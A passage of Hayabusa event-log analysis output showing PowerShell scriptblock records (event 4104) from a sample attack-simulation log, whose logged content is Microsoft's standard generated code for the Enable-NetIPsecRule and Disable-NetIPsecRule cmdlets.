[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) 
$__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and 
(@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and 
(@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { 
@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Disable-NetIPsecRule { 
[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] 
${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
